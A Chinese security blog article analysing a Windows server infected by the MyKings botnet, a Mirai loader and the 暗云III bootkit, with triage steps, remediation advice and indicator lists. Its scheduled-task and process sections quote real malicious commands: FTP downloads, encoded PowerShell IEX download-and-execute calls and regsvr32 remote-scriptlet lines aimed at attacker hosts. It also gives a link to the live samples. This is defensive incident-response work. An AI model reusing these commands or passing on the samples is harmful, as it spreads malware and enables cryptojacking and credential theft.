freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

暗云III v3.0 、Mykings、Mirai多个病毒家族结伴来袭的实战分析
2019-02-10 09:00:19

*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。

知识点

MyKings

MyKings是一个大规模多重僵尸网络,并安装门罗币挖矿机,利用服务器资源挖矿。

概述

挖矿攻击名称 MyKings
涉及平台 Windows平台
相关恶意代码家族 DDoS、Proxy、RAT、Mirai
攻击入口 通过扫描开放端口,利用漏洞和弱口令进行入侵
相关漏洞及编号 永恒之蓝
描述简介 MyKings 是一个由多个子僵尸网络构成的多重僵尸网络,2017 年 4 月底以来,该僵尸网络一直积极地扫描互联网上 1433 及其他多个端口,并在渗透进入受害者主机后传播包括 DDoS、Proxy、RAT、Miner 在内的多种不同用途的恶意代码。

1.攻击过程逻辑:

2-1.jpg

图-攻击过程

2-2.jpg

图-Payload执行过程

2.病毒各部分功能:

文件名 功能
c.bat 关闭端口
item.dat 远控木马主体DLL
J脚本(硬编码在Payload中) 结束指定进程,删除文件,运行item.dat
cmd批处理脚本(Payload联网获取到内存中) 结束指定进程,删除文件,删除指定账户运行c.bat 、item.dat

表-各部分功能

排查思路

1.攻击者利用SQL Server 弱密码进行暴力入侵方式入侵Windows系统后,会植入木马下载器conhost.exe(原始文件名ups.exe),该程序启动后会首先访问恶意链接http://ok.mymyxmra.ru以获取第二阶段恶意代码的下载地址。 

根据C:/Windows/System32/b.txt产生的老的连接状态日志发现有大量外发扫描1433端口判断可能是通过SQL Server弱密码进来的。

netstat.jpg

C:/Windows/Temp/conhost.exe源始文件名ups.exe:

Temp.jpg2.查找异常进程

proc-1.jpgproc-2.jpg

3.查找异常服务

服务名xWinWpdSrv

映像路径C:/Windows/system/msinfo.exe -s -syn 1000

service.png

扫描目标IP地址:生成机制越来越复杂

早期版本中, msinfo.exe用来扫描的目标IP只有两种:从云端配置文件wpd.dat获取、在本地根据外网出口IP随机生成;

最新样本中,增加了一种更复杂的本地随机生成算法,并且会避开一批保留地址段。

核心木马msinfo.exe用到的云端配置文件wpd.dat ,是一个加密的XML文档,其中指定了暴破成功后用到来下载Mirai样本的C2地址、需要扫描的网络服务端口、暴破各个端口所需的口令、入侵各个网络服务时执行的部分命令以及需要扫描的目标IP范围等配置。这些配置都可以根据后继僵尸网络的要求灵活更改。

模块化编程架构的msinfo.exe:主要是其Crack模块中通过继承一个基类Task_Crack,实现其中定义好的一组连接、暴破、执行命令等功能的函数接口即可定义一个Task_Crack_XXX子类,继而实现针对一个新的网络服务的攻击模块Crack模块与wpd.dat配置文件中定义的待扫描网络服务端口相对应,可以灵活更改针对不同网络服务的Crack功能。

其他辅助云端配置文件:msinfo.exe用到的另外一个辅助木马ups.exe ,会涉及其它云端配置文件。这些也都可以灵活配置,方便攻击者控制在下一阶段需要下载什么样本、执行什么样的命令。

4.查找异常计划任务                                         

名称
启动程序 
触发器
my1
c:/windows/system/my1.bat 
每天12点执行
Mysa
cmd.exe >/c echo open ftp.ftp0930.host>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye 
系统启动执行
Mysa1
rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa
系统启动执行
Mysa2
cmd.exe /c echo open ftp.ftp0930.host>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p
系统启动执行
ok
rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa
系统启动执行

task.jpg

task1.jpg

加载远控木马:

taskkill.jpg5.查找异常启动项

run.jpg

6.查找异常防火墙和本地安全策略    

firewall.jpgipsec2.jpg

木马文件配置防火墙策略,关闭135、137、138、139、445端口,防止再被其他病毒感染。

ipsec.jpg

7.查找异常目录&文件

C:/Windows/debug目录,门罗币挖矿相关的模块和配置文件:

debug.jpg

门罗币配置config.json

矿池url:"pool.minexmr.com:5555"

钱包地址:

4862mTLmCo9LGqn3XUrV9xaEfzgNPid7AM26XpeWWm4nfEtPfV9Eb1k2xYaYWRyM6LYETJkF3RCqF5JX5dQWEi3hNNE36C6

pass:"x"

poolconfig.jpg

C:/Windows/Help目录:
help3.jpg

C:/Windows/system目录。

msinfo.exe病毒母体通过注册服务&写入恶意代码到数据库的手段,实现持久化攻击,会连接云端,自动更新病毒,实时下载最新的攻击模块。
system.jpg

C:/Windows/system32系统命令目录。

b.txt 端口连接状态;

a.exe主要功能是实现清除可疑木马进程和启动DiskWriter远控木马item.dat;

csrse.exe原始文件ups.exe:

system32.jpg

C:/Windows/Temp临时文件目录,被注入的病毒代码执行恶意逻辑主要参照从C&C服务器请求到的配置文件,该文件释放到本地后路径为:%SystemRoot%\Temp\ntuser.dat。该文件被异或0x95加密过,在使用该文件时会对文件进行解密。

Temp.jpg

解密后的ntuser.dat配置内容,如下图所示:

ntuser.jpg

ntuser.dat配置内容总体分为两个部分:main和update。main部分中的所有ip和网址用来下载后门病毒相关配置,update部分中的ip和网址用来更新ntuser.dat配置数据,请求到的相关配置信息至今依然在持续更新。下载后门病毒配置信息cloud.txt的代码逻辑。

下载后门病毒配置信息

请求到的配置信息中,除后门病毒下载地址(exe键名对应数据)外,还有名为url的配置项,该功能开启后会hook CreateProcessW劫持浏览器启动参数,但现阶段该功能尚未被开启。配置信息,如下图所示:

cloud.jpg

配置信息

恶意代码会通过上图中的下载地址,将后门病毒下载到%SystemRoot%\Temp\conhost.exe目录进行执行。下载执行远程后门病毒相关逻辑。

下载执行后门病毒

Backdoor/Voluminer

该病毒运行后,首先会释放存放有C&C服务器列表的文件(xp.dat)至C:\Program Files\Common Files目录中,之后向C&C服务器列表中的服务器地址请求xpxmr.dat文件,用于更新C&C服务器列表。请求到的xpxmr.dat文件数据使用RSA算法进行过加密,进行解密后会重新写入到xpxmr.dat文件中,该文件为明文存放。

更新C&C服务器列表

病毒在运行中会向C&C服务器请求获取最新病毒版本号,当检测到存在新版本时,则会通过C&C服务器下载执行最新版本的病毒程序。当后门病毒发现当前系统为64位系统时,还会向C&C服务器请求64位版本的后门病毒到本地进行执行。

请求64位版本病毒

随后,病毒会使用地址列表中的C&C服务器地址下载挖矿所需的病毒组件,暂时我们发现会被病毒下载至本地病毒仅具有挖矿功能,但我们不排除其将来会下载其他病毒模块的可能性。病毒在下载文件后,会对病毒组件进行md5校验,病毒组件的md5值会参考C&C服务器中的md5.txt文件内容。

在该目录下有个以本机ip命名的txt文件

内容如下 :         

--------------------------------------------------------         

路径:C:\Windows\Temp\conhost.exe

命令行:C:\Windows\Temp\conhost.exe                      

路径:C:\Windows\SysWOW64\cmd.exe

命令行:cmd /c ""C:\windows\web\c3.bat" "

路径:C:\Windows\SysWOW64\cacls.exe

命令行:cacls  c:\windows\temp\docv8.exe/e /d system

路径:C:\Windows\system32\csrse.exe

命令行:"C:\Windows\system32\csrse.exe" 

路径:c:\windows\system\msinfo.exe

命令行:c:\windows\system\msinfo.exe -s -syn 1000

路径:c:\windows\debug\lsmo.exe

命令行:c:\windows\debug\lsmo.exe 

路径:C:\Windows\System32\cmd.exe

命令行:"C:\Windows\System32\cmd.exe" /C ping 127.0.0.1 -n 6 & taskkill -f /im lsmose.exe & c:\windows\debug\lsmose.exe

路径:c:\windows\debug\lsmose.exe

命令行:c:\windows\debug\lsmose.exe

路径:C:\Windows\system32\cmd.exe

命令行:cmd /c powershell.exe -nop -enc JAB3AGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AdwBtAGkALgAxADIAMQA3AGIAeQBlAC4AaABvAHMAdAA6ADgAOAA4ADgALwAyAC4AdAB4AHQAIgApAC4AdAByAGkAbQAoACkAIAAtAHMAcABsAGkAdAAgACIAWwBcAHIAXABuAF0AKwAiAHwAJQB7ACQAbgA9ACQAXwAuAHMAcABsAGkAdAAoACIALwAiACkAWwAtADEAXQA7ACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAF8ALAAgACQAbgApADsAcwB0AGEAcgB0ACAAJABuADsAfQA=&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.1217bye.host:8888/S.ps1')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://173.208.139.170/s.txt')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://35.182.171.137/s.jpg')||regsvr32 /u /s /i:http://wmi.1217bye.host:8888/1.txt scrobj.dll&regsvr32 /u /s /i:http://173.208.139.170/2.txt scrobj.dll&regsvr32 /u /s /i:http://35.182.171.137/3.txt scrobj.dll

路径:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

命令行:powershell.exe  IEX (New-Object system.Net.WebClient).DownloadString('http://173.208.139.170/s.txt')

--------------------------------------------

备注

加载远控木马,64base编码解码后得到:

$ w c = N e w - O b j e c t   S y s t e m . N e t . W e b C l i e n t ; $ w c . D o w n l o a d S t r i n g ( " h t t p : / / w m i . 1 2 1 7 b y e . h o s t : 8 8 8 8 / 2 . t x t " ) . t r i m ( )   - s p l i t   " [ \ r    \ n ] + " | % { $ n = $ _ . s p l i t ( " / " ) [ - 1 ] ; $ w c . D o w n l o a d F i l e ( $ _ ,   $ n ) ; s t a r t   $ n ; }  

利用regsvr32执行远程脚本命令  /u /s /i: http://wmi.1217bye.host:8888/1.txt scrobj.dll 该txt文件为一个远程js脚本,js脚本里的字符都被用16进制进行替换,解密后的js脚本,其主要功能是下载木马文件并执行。

1.jpg解密后的远程脚本,Upsnew2释放远控木马item.dat以及c3.bat脚本。

1-1.jpg

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DV6W313X   

ie临时文件目录下upsnew2[1].exe,原始文件名ups.exe:temporary.jpg

txt最下面是用mimikatz获得的系统明文密码:

txt.jpg

s.jpg

下载Invoke-Mimikatz.ps1脚本:up.jpg

要结束的进程列表:

kill.jpg

C:/Windows/Web目录:
web.jpgc3.bat脚本功能如下:

c3.jpg

C:\Program Files\Common Files目录下:

common.jpgC:/Program Files/目录下:

program.jpgC:/Windows/SysWOW64目录下,wpd.dat扫描的目标IP从云端配置文件:

syswow64.jpg

C:/Windows/taidbox/mbrbackup.bin,暗云III v3.0:

taidbox.jpg

guanjia.jpg

暗云III v3.0其线程回调例程执行流程如下:

a)调用RtlInitUnicodeString初始化csrss.exe;

b)查找进程csrss.exe,检测到csrss.exe后则继续下一步;

c)感染MBR,并保护1到62扇区的数据,如果试图读前62扇区的数据则会返回正常的数据,如果试图写前62扇区的数据则返回写入的数据进行欺骗,实际没有被写入;

d)调用CreateSystemThread创建系统线程,该线程函数主要完成了shellcode下载执行等功能,可拉取任意功能恶意代码进行执行。

解决方案

1.隔离感染主机:已中毒计算机尽快隔离,关闭所有网络连接,禁用网卡;

2.切断传播途径:从僵尸网络当前的攻击重点来看,防范其通过1433端口入侵计算机是非常有必要的。此外,Bot程序还有多种攻击方式尚未使用,这些攻击方式可能在未来的某一天被开启,因此也需要防范可能发生的攻击;

3.查找攻击源:加固SQL Server服务器,修补服务器安全漏洞。使用安全的密码策略,使用高强度密码,切勿使用弱口令,防止黑客暴力破解,禁用sa账号;

4.查杀病毒:使用管家急救箱进行查杀,下载网址:

http://dlied6.qq.com/invc/xfspeed/qqpcmgr/other/SystemAidBoxPro.zip ;

5.修补漏洞:特别注意445端口的开放情况,如果不需要使用Windows局域网共享服务,可以通过设置防火墙规则来关闭445等端口,并及时打上永恒之蓝MS17-010等漏洞相关补丁;

6.注意MSSQL,RDP,Telnet等服务的弱口令问题;

7.注意系统账户情况,禁用不必要的账户。

参考

1.具备多病毒功能!MiraiXMiner物联网僵尸网络攻击来袭

https://www.freebuf.com/articles/terminal/191303.html

2.恶意挖矿攻击的现状、检测及处置

https://www.freebuf.com/articles/system/189454.html

3.MyKings:一个大规模多重僵尸网络

https://www.freebuf.com/articles/network/161286.html 

4.【木马分析】悄然崛起的挖矿机僵尸网络:打服务器挖价值百万门罗币

https://www.anquanke.com/post/id/86751 

5.MyKings僵尸网络最新变种突袭,攻击代码多次加密混淆,难以检测 

https://mp.weixin.qq.com/s/GJ4ilPNpe7NPevw4MHP0iw

6.弱口令爆破SQL Server服务器 暗云、Mykings、Mirai多个病毒家族结伴来袭 

https://www.freebuf.com/column/193260.html

7.暗云系列Bootkit木马最新动态

https://www.freebuf.com/column/187489.html

8.MyKing黑产团伙最新挖矿活动曝光 

https://x.threatbook.cn/nodev4/vb4/article?threatInfoID=936

9.中国黑客利用“永恒之蓝”搜刮肉鸡构建僵尸网络 

www.sohu.com/a/144223631_765820

10.僵尸网络“Mykings” 

www.voidcn.com/article/p-xdbozctv-brp.html

11.“隐匿者”病毒团伙技术升级传播病毒 暴力入侵电脑威胁全网用户 

https://www.secpulse.com/archives/75273.html

12.彻底曝光黑客组织“隐匿者”:目前作恶最多的网络攻击团伙 

www.4hou.com/info/news/6838.html

13.代码战争的主阵地——来自终端的威胁情报详述.pdf 

www.studylead.com/p-7400580.html

14.【木马分析】分析利用“永恒之蓝”漏洞传播的RAT 

https://www.anquanke.com/post/id/86822 

域名

127.0.0.1  ftp.ftp0930.host

127.0.0.1  pool.minexmr.com

127.0.0.1  raw.githubusercontent.com

127.0.0.1  wmi.1217bye.host

127.0.0.1  down.mysking.info

127.0.0.1  js.ftp0930.host

127.0.0.1  js.mykings.top

127.0.0.1  ftp.ftp0118.info

127.0.0.1  ok.mymyxmra.ru

127.0.0.1  mbr.kill0604.ru

ip

173.208.139.170

35.182.171.137

45.58.135.106

103.213.246.23

78.142.29.152

74.222.14.61

18.218.14.96

223.25.247.240

223.25.247.152

103.95.28.54

23.88.160.137

81.177.135.35

78.142.29.110

174.128.239.250

66.117.6.174

暗云III v3.0 、Mykings、Mirai木马样本已放到网盘供学习。

链接:https://pan.baidu.com/s/14Hqb3IrjvAqykJSsgKk5Rw 

提取码:3uoq 

*本文作者:xuchen16,转载请注明来自FreeBuf.COM

# 病毒攻击 # “暗云” # Mirai
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者